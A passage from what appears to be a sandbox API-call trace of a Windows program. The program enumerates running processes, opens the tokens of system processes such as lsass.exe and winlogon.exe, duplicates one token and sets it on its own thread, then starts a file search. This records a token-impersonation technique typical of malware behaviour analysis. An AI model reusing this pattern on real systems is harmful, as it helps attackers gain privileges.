OpenProcessToken (in: ProcessHandle=0x3ac, DesiredAccess=0xa, TokenHandle=0x219fdc4 | out: TokenHandle=0x219fdc4*=0x2f4) returned 1 [0112.333] GetTokenInformation (in: TokenHandle=0x2f4, TokenInformationClass=0xa, TokenInformation=0x219fe20, TokenInformationLength=0x38, ReturnLength=0x219fde4 | out: TokenInformation=0x219fe20, ReturnLength=0x219fde4) returned 1 [0112.333] CloseHandle (hObject=0x2f4) returned 1 [0112.333] CloseHandle (hObject=0x3ac) returned 1 [0112.333] Process32Next (in: hSnapshot=0x13c0, lppe=0x219fe58 | out: lppe=0x219fe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0112.334] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x178) returned 0x3ac [0112.334] OpenProcessToken (in: ProcessHandle=0x3ac, DesiredAccess=0xa, TokenHandle=0x219fdc4 | out: TokenHandle=0x219fdc4*=0x2f4) returned 1 [0112.334] GetTokenInformation (in: TokenHandle=0x2f4, TokenInformationClass=0xa, TokenInformation=0x219fe20, TokenInformationLength=0x38, ReturnLength=0x219fde4 | out: TokenInformation=0x219fe20, ReturnLength=0x219fde4) returned 1 [0112.334] CloseHandle (hObject=0x2f4) returned 1 [0112.334] CloseHandle (hObject=0x3ac) returned 1 [0112.334] Process32Next (in: hSnapshot=0x13c0, lppe=0x219fe58 | out: lppe=0x219fe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0112.335] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x184) returned 0x3ac [0112.335] OpenProcessToken (in: ProcessHandle=0x3ac, DesiredAccess=0xa, TokenHandle=0x219fdc4 | out: TokenHandle=0x219fdc4*=0x2f4) returned 1 [0112.335] GetTokenInformation (in: TokenHandle=0x2f4, TokenInformationClass=0xa, TokenInformation=0x219fe20, TokenInformationLength=0x38, ReturnLength=0x219fde4 | out: TokenInformation=0x219fe20, ReturnLength=0x219fde4) returned 1 [0112.335] CloseHandle (hObject=0x2f4) returned 1 [0112.335] CloseHandle (hObject=0x3ac) returned 1 [0112.335] Process32Next (in: hSnapshot=0x13c0, lppe=0x219fe58 | out: lppe=0x219fe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0112.336] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x1ac) returned 0x3ac [0112.336] OpenProcessToken (in: ProcessHandle=0x3ac, DesiredAccess=0xa, TokenHandle=0x219fdc4 | out: TokenHandle=0x219fdc4*=0x2f4) returned 1 [0112.336] GetTokenInformation (in: TokenHandle=0x2f4, TokenInformationClass=0xa, TokenInformation=0x219fe20, TokenInformationLength=0x38, ReturnLength=0x219fde4 | out: TokenInformation=0x219fe20, ReturnLength=0x219fde4) returned 1 [0112.336] CloseHandle (hObject=0x2f4) returned 1 [0112.336] CloseHandle (hObject=0x3ac) returned 1 [0112.336] Process32Next (in: hSnapshot=0x13c0, lppe=0x219fe58 | out: lppe=0x219fe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0112.337] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x1d8) returned 0x3ac [0112.337] OpenProcessToken (in: ProcessHandle=0x3ac, DesiredAccess=0xa, TokenHandle=0x219fdc4 | out: TokenHandle=0x219fdc4*=0x2f4) returned 1 [0112.337] GetTokenInformation (in: TokenHandle=0x2f4, TokenInformationClass=0xa, TokenInformation=0x219fe20, TokenInformationLength=0x38, ReturnLength=0x219fde4 | out: TokenInformation=0x219fe20, ReturnLength=0x219fde4) returned 1 [0112.337] CloseHandle (hObject=0x2f4) returned 1 [0112.337] CloseHandle (hObject=0x3ac) returned 1 [0112.337] Process32Next (in: hSnapshot=0x13c0, lppe=0x219fe58 | out: lppe=0x219fe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0112.337] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x1e0) returned 0x3ac [0112.338] OpenProcessToken (in: ProcessHandle=0x3ac, DesiredAccess=0xa, TokenHandle=0x219fdc4 | out: TokenHandle=0x219fdc4*=0x2f4) returned 1 [0112.338] GetTokenInformation (in: TokenHandle=0x2f4, TokenInformationClass=0xa, TokenInformation=0x219fe20, TokenInformationLength=0x38, ReturnLength=0x219fde4 | out: TokenInformation=0x219fe20, ReturnLength=0x219fde4) returned 1 [0112.338] CloseHandle (hObject=0x2f4) returned 1 [0112.338] CloseHandle (hObject=0x3ac) returned 1 [0112.338] Process32Next (in: hSnapshot=0x13c0, lppe=0x219fe58 | out: lppe=0x219fe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0112.338] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x1e8) returned 0x3ac [0112.338] OpenProcessToken (in: ProcessHandle=0x3ac, DesiredAccess=0xa, TokenHandle=0x219fdc4 | out: TokenHandle=0x219fdc4*=0x2f4) returned 1 [0112.338] GetTokenInformation (in: TokenHandle=0x2f4, TokenInformationClass=0xa, TokenInformation=0x219fe20, TokenInformationLength=0x38, ReturnLength=0x219fde4 | out: TokenInformation=0x219fe20, ReturnLength=0x219fde4) returned 1 [0112.339] CloseHandle (hObject=0x2f4) returned 1 [0112.339] CloseHandle (hObject=0x3ac) returned 1 [0112.339] Process32Next (in: hSnapshot=0x13c0, lppe=0x219fe58 | out: lppe=0x219fe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.339] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x250) returned 0x3ac [0112.339] OpenProcessToken (in: ProcessHandle=0x3ac, DesiredAccess=0xa, TokenHandle=0x219fdc4 | out: TokenHandle=0x219fdc4*=0x0) returned 0 [0112.339] CloseHandle (hObject=0x3ac) returned 1 [0112.339] Process32Next (in: hSnapshot=0x13c0, lppe=0x219fe58 | out: lppe=0x219fe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.340] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x294) returned 0x3ac [0112.340] OpenProcessToken (in: ProcessHandle=0x3ac, DesiredAccess=0xa, TokenHandle=0x219fdc4 | out: TokenHandle=0x219fdc4*=0x0) returned 0 [0112.340] CloseHandle (hObject=0x3ac) returned 1 [0112.340] Process32Next (in: hSnapshot=0x13c0, lppe=0x219fe58 | out: lppe=0x219fe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.341] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x2c8) returned 0x3ac [0112.341] OpenProcessToken (in: ProcessHandle=0x3ac, DesiredAccess=0xa, TokenHandle=0x219fdc4 | out: TokenHandle=0x219fdc4*=0x0) returned 0 [0112.341] CloseHandle (hObject=0x3ac) returned 1 [0112.341] Process32Next (in: hSnapshot=0x13c0, lppe=0x219fe58 | out: lppe=0x219fe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.342] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x338) returned 0x3ac [0112.342] OpenProcessToken (in: ProcessHandle=0x3ac, DesiredAccess=0xa, TokenHandle=0x219fdc4 | out: TokenHandle=0x219fdc4*=0x2f4) returned 1 [0112.342] GetTokenInformation (in: TokenHandle=0x2f4, TokenInformationClass=0xa, TokenInformation=0x219fe20, TokenInformationLength=0x38, ReturnLength=0x219fde4 | out: TokenInformation=0x219fe20, ReturnLength=0x219fde4) returned 1 [0112.342] CloseHandle (hObject=0x2f4) returned 1 [0112.342] CloseHandle (hObject=0x3ac) returned 1 [0112.342] Process32Next (in: hSnapshot=0x13c0, lppe=0x219fe58 | out: lppe=0x219fe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.343] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x370) returned 0x3ac [0112.343] OpenProcessToken (in: ProcessHandle=0x3ac, DesiredAccess=0xa, TokenHandle=0x219fdc4 | out: TokenHandle=0x219fdc4*=0x2f4) returned 1 [0112.343] GetTokenInformation (in: TokenHandle=0x2f4, TokenInformationClass=0xa, TokenInformation=0x219fe20, TokenInformationLength=0x38, ReturnLength=0x219fde4 | out: TokenInformation=0x219fe20, ReturnLength=0x219fde4) returned 1 [0112.343] CloseHandle (hObject=0x2f4) returned 1 [0112.343] CloseHandle (hObject=0x3ac) returned 1 [0112.343] Process32Next (in: hSnapshot=0x13c0, lppe=0x219fe58 | out: lppe=0x219fe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0112.344] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x3ac) returned 0x3ac [0112.344] OpenProcessToken (in: ProcessHandle=0x3ac, DesiredAccess=0xa, TokenHandle=0x219fdc4 | out: TokenHandle=0x219fdc4*=0x0) returned 0 [0112.344] CloseHandle (hObject=0x3ac) returned 1 [0112.344] Process32Next (in: hSnapshot=0x13c0, lppe=0x219fe58 | out: lppe=0x219fe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.345] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0xc8) returned 0x3ac [0112.345] OpenProcessToken (in: ProcessHandle=0x3ac, DesiredAccess=0xa, TokenHandle=0x219fdc4 | out: TokenHandle=0x219fdc4*=0x0) returned 0 [0112.345] CloseHandle (hObject=0x3ac) returned 1 [0112.345] Process32Next (in: hSnapshot=0x13c0, lppe=0x219fe58 | out: lppe=0x219fe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x11c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.346] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x11c) returned 0x3ac [0112.346] OpenProcessToken (in: ProcessHandle=0x3ac, DesiredAccess=0xa, TokenHandle=0x219fdc4 | out: TokenHandle=0x219fdc4*=0x0) returned 0 [0112.346] CloseHandle (hObject=0x3ac) returned 1 [0112.346] Process32Next (in: hSnapshot=0x13c0, lppe=0x219fe58 | out: lppe=0x219fe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x444, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0112.346] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x444) returned 0x3ac [0112.347] OpenProcessToken (in: ProcessHandle=0x3ac, DesiredAccess=0xa, TokenHandle=0x219fdc4 | out: TokenHandle=0x219fdc4*=0x2f4) returned 1 [0112.347] GetTokenInformation (in: TokenHandle=0x2f4, TokenInformationClass=0xa, TokenInformation=0x219fe20, TokenInformationLength=0x38, ReturnLength=0x219fde4 | out: TokenInformation=0x219fe20, ReturnLength=0x219fde4) returned 1 [0112.347] DuplicateToken (in: ExistingTokenHandle=0x2f4, ImpersonationLevel=0x2, DuplicateTokenHandle=0x219fdd0 | out: DuplicateTokenHandle=0x219fdd0*=0x308) returned 1 [0112.347] SetThreadToken (Thread=0x0, Token=0x308) returned 1 [0112.347] CloseHandle (hObject=0x308) returned 1 [0112.347] CloseHandle (hObject=0x2f4) returned 1 [0112.347] CloseHandle (hObject=0x3ac) returned 1 [0112.347] CloseHandle (hObject=0x13c0) returned 1 [0112.347] lstrcmpiW (lpString1="C:\\", lpString2="Microsoft Terminal Services") returned -1 [0112.348] wsprintfW (in: param_1=0x219fb18, param_2="%s\\*" | out: param_1="Microsoft Terminal Services\\*") returned 29 [0112.348] FindFirstFileExW (in: lpFileName="Microsoft Terminal Services\\*", fInfoLevelId=0x0, lpFindFileData=0x219fd28, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x219fd28) returned 0xffffffff [0112.348] RtlExitUserThread (Status=0x0) Thread: id = 319 os_tid = 0xf40 [0112.349] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x39afdc8 | out: TokenHandle=0x39afdc8*=0x3ac) returned 1 [0112.349] GetTokenInformation (in: TokenHandle=0x3ac, TokenInformationClass=0x12, TokenInformation=0x39afdc0, TokenInformationLength=0x4, ReturnLength=0x39afdcc | out: TokenInformation=0x39afdc0, ReturnLength=0x39afdcc) returned 1 [0112.349] GetTokenInformation (in: TokenHandle=0x3ac, TokenInformationClass=0x13, TokenInformation=0x39afdc0, TokenInformationLength=0x4, ReturnLength=0x39afdcc | out: TokenInformation=0x39afdc0, ReturnLength=0x39afdcc) returned 1 [0112.349] GetTokenInformation (in: TokenHandle=0x13c0, TokenInformationClass=0xa, TokenInformation=0x39afde8, TokenInformationLength=0x38, ReturnLength=0x39afdcc | out: TokenInformation=0x39afde8, ReturnLength=0x39afdcc) returned 1 [0112.349] CloseHandle (hObject=0x13c0) returned 1 [0112.349] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x13c0 [0112.354] Process32First (in: hSnapshot=0x13c0, lppe=0x39afe58 | out: lppe=0x39afe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0112.354] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0112.354] Process32Next (in: hSnapshot=0x13c0, lppe=0x39afe58 | out: lppe=0x39afe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0112.355] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x4) returned 0x2f4 [0112.355] OpenProcessToken (in: ProcessHandle=0x2f4, DesiredAccess=0xa, TokenHandle=0x39afdc4 | out: TokenHandle=0x39afdc4*=0x0) returned 0 [0112.355] CloseHandle (hObject=0x2f4) returned 1 [0112.355] Process32Next (in: hSnapshot=0x13c0, lppe=0x39afe58 | out: lppe=0x39afe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0112.356] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x104) returned 0x2f4 [0112.356] OpenProcessToken (in: ProcessHandle=0x2f4, DesiredAccess=0xa, TokenHandle=0x39afdc4 | out: TokenHandle=0x39afdc4*=0x308) returned 1 [0112.356] GetTokenInformation (in: TokenHandle=0x308, TokenInformationClass=0xa, TokenInformation=0x39afe20, TokenInformationLength=0x38, ReturnLength=0x39afde4 | out: TokenInformation=0x39afe20, ReturnLength=0x39afde4) returned 1 [0112.356] CloseHandle (hObject=0x308) returned 1 [0112.356] CloseHandle (hObject=0x2f4) returned 1 [0112.356] Process32Next (in: hSnapshot=0x13c0, lppe=0x39afe58 | out: lppe=0x39afe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0112.357] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x148) returned 0x2f4 [0112.357] OpenProcessToken (in: ProcessHandle=0x2f4, DesiredAccess=0xa, TokenHandle=0x39afdc4 | out: TokenHandle=0x39afdc4*=0x308) returned 1 [0112.357] GetTokenInformation (in: TokenHandle=0x308, TokenInformationClass=0xa, TokenInformation=0x39afe20, TokenInformationLength=0x38, ReturnLength=0x39afde4 | out: TokenInformation=0x39afe20, ReturnLength=0x39afde4) returned 1 [0112.357] CloseHandle (hObject=0x308) returned 1 [0112.357] CloseHandle (hObject=0x2f4) returned 1 [0112.357] Process32Next (in: hSnapshot=0x13c0, lppe=0x39afe58 | out: lppe=0x39afe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0112.358] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x178) returned 0x2f4 [0112.358] OpenProcessToken (in: ProcessHandle=0x2f4, DesiredAccess=0xa, TokenHandle=0x39afdc4 | out: TokenHandle=0x39afdc4*=0x308) returned 1 [0112.358] GetTokenInformation (in: TokenHandle=0x308, TokenInformationClass=0xa, TokenInformation=0x39afe20, TokenInformationLength=0x38, ReturnLength=0x39afde4 | out: TokenInformation=0x39afe20, ReturnLength=0x39afde4) returned 1 [0112.358] CloseHandle (hObject=0x308) returned 1 [0112.358] CloseHandle (hObject=0x2f4) returned 1 [0112.358] Process32Next (in: hSnapshot=0x13c0, lppe=0x39afe58 | out: lppe=0x39afe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0112.360] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x184) returned 0x2f4 [0112.360] OpenProcessToken (in: ProcessHandle=0x2f4, DesiredAccess=0xa, TokenHandle=0x39afdc4 | out: TokenHandle=0x39afdc4*=0x308) returned 1 [0112.360] GetTokenInformation (in: TokenHandle=0x308, TokenInformationClass=0xa, TokenInformation=0x39afe20, TokenInformationLength=0x38, ReturnLength=0x39afde4 | out: TokenInformation=0x39afe20, ReturnLength=0x39afde4) returned 1 [0112.360] CloseHandle (hObject=0x308) returned 1 [0112.360] CloseHandle (hObject=0x2f4) returned 1 [0112.360] Process32Next (in: hSnapshot=0x13c0, lppe=0x39afe58 | out: lppe=0x39afe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0112.361] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x1ac) returned 0x2f4 [0112.361] OpenProcessToken (in: ProcessHandle=0x2f4, DesiredAccess=0xa, TokenHandle=0x39afdc4 | out: TokenHandle=0x39afdc4*=0x308) returned 1 [0112.361] GetTokenInformation (in: TokenHandle=0x308, TokenInformationClass=0xa, TokenInformation=0x39afe20, TokenInformationLength=0x38, ReturnLength=0x39afde4 | out: TokenInformation=0x39afe20, ReturnLength=0x39afde4) returned 1 [0112.361] CloseHandle (hObject=0x308) returned 1 [0112.361] CloseHandle (hObject=0x2f4) returned 1 [0112.361] Process32Next (in: hSnapshot=0x13c0, lppe=0x39afe58 | out: lppe=0x39afe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0112.362] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x1d8) returned 0x2f4 [0112.362] OpenProcessToken (in: ProcessHandle=0x2f4, DesiredAccess=0xa, TokenHandle=0x39afdc4 | out: TokenHandle=0x39afdc4*=0x308) returned 1 [0112.362] GetTokenInformation (in: TokenHandle=0x308, TokenInformationClass=0xa, TokenInformation=0x39afe20, TokenInformationLength=0x38, ReturnLength=0x39afde4 | out: TokenInformation=0x39afe20, ReturnLength=0x39afde4) returned 1 [0112.362] CloseHandle (hObject=0x308) returned 1 [0112.362] CloseHandle (hObject=0x2f4) returned 1 [0112.362] Process32Next (in: hSnapshot=0x13c0, lppe=0x39afe58 | out: lppe=0x39afe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0112.363] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x1e0) returned 0x2f4 [0112.363] OpenProcessToken (in: ProcessHandle=0x2f4, DesiredAccess=0xa, TokenHandle=0x39afdc4 | out: TokenHandle=0x39afdc4*=0x308) returned 1 [0112.363] GetTokenInformation (in: TokenHandle=0x308, TokenInformationClass=0xa, TokenInformation=0x39afe20, TokenInformationLength=0x38, ReturnLength=0x39afde4 | out: TokenInformation=0x39afe20, ReturnLength=0x39afde4) returned 1 [0112.363] CloseHandle (hObject=0x308) returned 1 [0112.363] CloseHandle (hObject=0x2f4) returned 1 [0112.363] Process32Next (in: hSnapshot=0x13c0, lppe=0x39afe58 | out: lppe=0x39afe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0112.363] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x1e8) returned 0x2f4 [0112.363] OpenProcessToken (in: ProcessHandle=0x2f4, DesiredAccess=0xa, TokenHandle=0x39afdc4 | out: TokenHandle=0x39afdc4*=0x308) returned 1 [0112.363] GetTokenInformation (in: TokenHandle=0x308, TokenInformationClass=0xa, TokenInformation=0x39afe20, TokenInformationLength=0x38, ReturnLength=0x39afde4 | out: TokenInformation=0x39afe20, ReturnLength=0x39afde4) returned 1 [0112.364] CloseHandle (hObject=0x308) returned 1 [0112.364] CloseHandle (hObject=0x2f4) returned 1 [0112.364] Process32Next (in: hSnapshot=0x13c0, lppe=0x39afe58 | out: lppe=0x39afe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.364] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x250) returned 0x2f4 [0112.364] OpenProcessToken (in: ProcessHandle=0x2f4, DesiredAccess=0xa, TokenHandle=0x39afdc4 | out: TokenHandle=0x39afdc4*=0x0) returned 0 [0112.364] CloseHandle (hObject=0x2f4) returned 1 [0112.364] Process32Next (in: hSnapshot=0x13c0, lppe=0x39afe58 | out: lppe=0x39afe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.365] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x294) returned 0x2f4 [0112.365] OpenProcessToken (in: ProcessHandle=0x2f4, DesiredAccess=0xa, TokenHandle=0x39afdc4 | out: TokenHandle=0x39afdc4*=0x0) returned 0 [0112.365] CloseHandle (hObject=0x2f4) returned 1 [0112.365] Process32Next (in: hSnapshot=0x13c0, lppe=0x39afe58 | out: lppe=0x39afe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.366] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x2c8) returned 0x2f4 [0112.366] OpenProcessToken (in: ProcessHandle=0x2f4, DesiredAccess=0xa, TokenHandle=0x39afdc4 | out: TokenHandle=0x39afdc4*=0x0) returned 0 [0112.366] CloseHandle (hObject=0x2f4) returned 1 [0112.366] Process32Next (in: hSnapshot=0x13c0, lppe=0x39afe58 | out: lppe=0x39afe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.367] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x338) returned 0x2f4 [0112.367] OpenProcessToken (in: ProcessHandle=0x2f4, DesiredAccess=0xa, TokenHandle=0x39afdc4 | out: TokenHandle=0x39afdc4*=0x308) returned 1 [0112.367] GetTokenInformation (in: TokenHandle=0x308, TokenInformationClass=0xa, TokenInformation=0x39afe20, TokenInformationLength=0x38, ReturnLength=0x39afde4 | out: TokenInformation=0x39afe20, ReturnLength=0x39afde4) returned 1 [0112.367] CloseHandle (hObject=0x308) returned 1 [0112.367] CloseHandle (hObject=0x2f4) returned 1 [0112.367] Process32Next (in: hSnapshot=0x13c0, lppe=0x39afe58 | out: lppe=0x39afe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.367] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x370) returned 0x2f4 [0112.367] OpenProcessToken (in: ProcessHandle=0x2f4, DesiredAccess=0xa, TokenHandle=0x39afdc4 | out: TokenHandle=0x39afdc4*=0x308) returned 1 [0112.367] GetTokenInformation (in: TokenHandle=0x308, TokenInformationClass=0xa, TokenInformation=0x39afe20, TokenInformationLength=0x38, ReturnLength=0x39afde4 | out: TokenInformation=0x39afe20, ReturnLength=0x39afde4) returned 1 [0112.367] CloseHandle (hObject=0x308) returned 1 [0112.367] CloseHandle (hObject=0x2f4) returned 1 [0112.368] Process32Next (in: hSnapshot=0x13c0, lppe=0x39afe58 | out: lppe=0x39afe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0112.368] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x3ac) returned 0x2f4 [0112.368] OpenProcessToken (in: ProcessHandle=0x2f4, DesiredAccess=0xa, TokenHandle=0x39afdc4 | out: TokenHandle=0x39afdc4*=0x0) returned 0 [0112.368] CloseHandle (hObject=0x2f4) returned 1 [0112.368] Process32Next (in: hSnapshot=0x13c0, lppe=0x39afe58 | out: lppe=0x39afe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.369] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0xc8) returned 0x2f4 